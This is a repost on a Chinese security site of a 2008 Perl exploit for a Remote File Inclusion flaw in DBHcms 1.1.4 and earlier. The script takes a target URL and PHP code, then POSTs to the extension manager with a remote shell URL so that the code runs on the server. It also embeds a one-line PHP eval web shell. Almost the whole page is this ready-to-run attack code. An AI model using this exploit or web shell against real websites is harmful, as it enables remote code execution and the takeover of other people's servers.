DBHcms <= 1.1.4 Remote File Inclusion exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

DBHcms <= 1.1.4 Remote File Inclusion exploit

来源：http://www.randombase.com 作者：Iron 发布时间：2008-02-26

#!/usr/bin/perl
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# Vendor url: www.drbenhur.com
#
# exploit is hard to execute through a browser -possible though- since it's with POST
# ~Iron
# http://www.randombase.com
require LWP::UserAgent;
#Shell:
# <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>
$shell_url = "http://localhost/s.txt";

print "#
# DBHcms <= 1.1.4 Remote File Inclusion exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/dhbcms/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
$target = "http://".$target;
}
if($target !~ /\/$/)
{
$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "dbhcms/mod/mod.extmanager.php?do=".$code;

$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;

$response = $ua->post($target,
{
'extmanager_install' => $shell_url.'?'
});

if ($response->is_success)
{
print "\n"."#" x 20 ."\n";
if($response->content =~ /URL file-access/)
{
print 'Exploit failed';
}
else
{
print $response->content;
}
print "\n"."#" x 20 ."\n";
}
else
{
die "Error: ".$response->status_line;
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告